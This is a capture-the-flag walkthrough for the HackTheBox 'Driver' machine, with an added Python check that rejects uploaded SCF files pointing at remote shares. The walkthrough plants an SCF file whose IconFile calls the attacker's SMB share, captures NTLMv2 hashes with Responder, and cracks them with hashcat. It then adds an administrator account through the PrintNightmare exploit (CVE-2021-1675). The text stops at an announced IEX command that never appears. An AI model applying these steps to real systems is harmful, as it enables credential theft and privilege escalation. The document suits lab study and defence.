In this post, I would like to share a walkthrough of the Driver machine from HackTheBox.
This machine is rated Easy on HackTheBox.
What will you gain from the Driver machine?
For the user flag, you will use an SMB relay approach to obtain tony’s password.
For the root flag, you will need to run an exploit related to PrintNightmare.
Once the VPN connection is up (the configuration file is downloaded from HackTheBox), we can start information gathering on the machine by running nmap -sC -sV -p- <IP Address> -Pn
Let’s try to access the web interface.
We are required to enter a username and password to log in to the dashboard. My guess for the credentials is admin:admin.
Some readers may wonder how I knew the username was admin: if you look carefully, the login prompt says “Please enter a password for admin”.
Finally, we managed to log in to the dashboard.
Gaining Privileged Access
On the menu bar, nothing is useful except the Firmware Updates function, which leads to a page asking us to upload new firmware for the printer.
Most of the exploitation methods I found use Metasploit, which I try to avoid. However, we came across a website that shows how to exploit the machine without Metasploit.
As a result, we need to create a file in the SCF format, as shown in the screenshot above.
The only modification needed is the IconFile entry: \\<Your IP Address>\share\<anyname>.ico
Let’s run the Responder tool with “sudo responder -wrf --lm -v -I tun0”; it then waits at “Listening for the event“.
Once Responder is running, we can attach the SCF file on the firmware update page and click “Submit“.
After a while, Responder shows a lot of NTLMv2 hashes, all belonging to tony.
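The upload in the steps above works because the firmware-update handler accepts an arbitrary file and a Windows user or service later browses the folder it lands in, so Explorer follows the SCF's IconFile entry to the listener's share and authenticates. The following Python is an added example (not code from the original write-up, from Responder or from the printer software) of the check an upload handler on the defending side could run: parse the content as an SCF and reject it when any field points at a UNC path or remote URL, whatever extension the client chose. The function names, the sample SCF bodies and the 10.0.0.1 address in them are constructed for this example.

```python
import re
from dataclasses import dataclass, field

# A UNC path: two backslashes, a host, a backslash (\\host\share\...)
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
# URL-style references that also cause a remote fetch when Explorer resolves them
REMOTE_URL_RE = re.compile(r"^(?:file|https?)://", re.IGNORECASE)


@dataclass
class ScfFinding:
    is_scf: bool
    remote_refs: list = field(default_factory=list)


def parse_ini(text: str) -> dict:
    """Minimal INI parser: {section: {key: value}}, section and key names lower-cased."""
    sections: dict = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def inspect_scf(data: bytes) -> ScfFinding:
    """Decide whether data is SCF content and list every field that points off-host."""
    ini = parse_ini(data.decode("utf-8", errors="replace"))
    # SCF content is INI text with a [Shell] section carrying Command=; use that as the marker.
    is_scf = "shell" in ini and "command" in ini["shell"]
    finding = ScfFinding(is_scf=is_scf)
    if not is_scf:
        return finding
    for section, fields in ini.items():
        for key, value in fields.items():
            if UNC_RE.match(value) or REMOTE_URL_RE.match(value):
                finding.remote_refs.append(f"[{section}] {key}={value}")
    return finding


def should_reject_upload(data: bytes) -> bool:
    """Upload policy: reject SCF content that references a remote location,
    regardless of the file name or extension the client supplied."""
    finding = inspect_scf(data)
    return finding.is_scf and bool(finding.remote_refs)


# Constructed samples for this example (not taken from the original page).
BENIGN_SCF = (b"[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n"
              b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
# Placeholder address 10.0.0.1 stands in for the listener's IP in the write-up.
SUSPICIOUS_SCF = (b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.1\\share\\anyname.ico\r\n"
                  b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
NOT_SCF = b"version=1.2.3\r\nchecksum=00000000\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_SCF), ("suspicious", SUSPICIOUS_SCF), ("not_scf", NOT_SCF)):
        verdict = "reject" if should_reject_upload(blob) else "accept"
        print(name, verdict, inspect_scf(blob).remote_refs)
```

The check is content-based on purpose: renaming the SCF to match whatever the upload form expects (a firmware image here) defeats an extension filter, while the [Shell]/Command/IconFile structure has to survive for Explorer to act on it. Pair it with blocking outbound SMB from the server that stores uploads, which removes the authentication leak even when a file slips through.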
Let’s save the first hash into a file and try to recover the password with hashcat: “hashcat -m 5600 -a 0 <hash file> /<your file location that stores rockyou>/rockyou.txt“
Finally, we have tony’s password: liltony.
Let’s try to log in to the machine with the evil-winrm tool: evil-winrm -i 10.10.11.106 -u tony -p liltony
We can read the user flag by running “type C:\Users\tony\Desktop\user.txt“.
Escalating to Admin Privileges on the Driver Machine
At last, I can test the PrintNightmare vulnerability on an HTB machine.
For those who are not familiar with the PrintNightmare exploit, you can look it up online.
First, download the PrintNightmare exploit on your own machine by running “git clone https://github.com/calebstewart/CVE-2021-1675”.
After that, upload CVE-2021-1675.ps1 to the HTB machine.
Next, run “Import-Module .\CVE-2021-1675.ps1“.
Finally, create a new user with a password of your choice by running Invoke-Nightmare -NewUser “anything” -NewPassword “anything”.
As a result, we can log in to the machine using the credentials we just created.
We should be able to obtain the root flag by running “type C:\Users\administrator\Desktop\root.txt“.
If we get an error when importing the .ps1 module on the HTB machine, we can instead load the file with the IEX command shown below: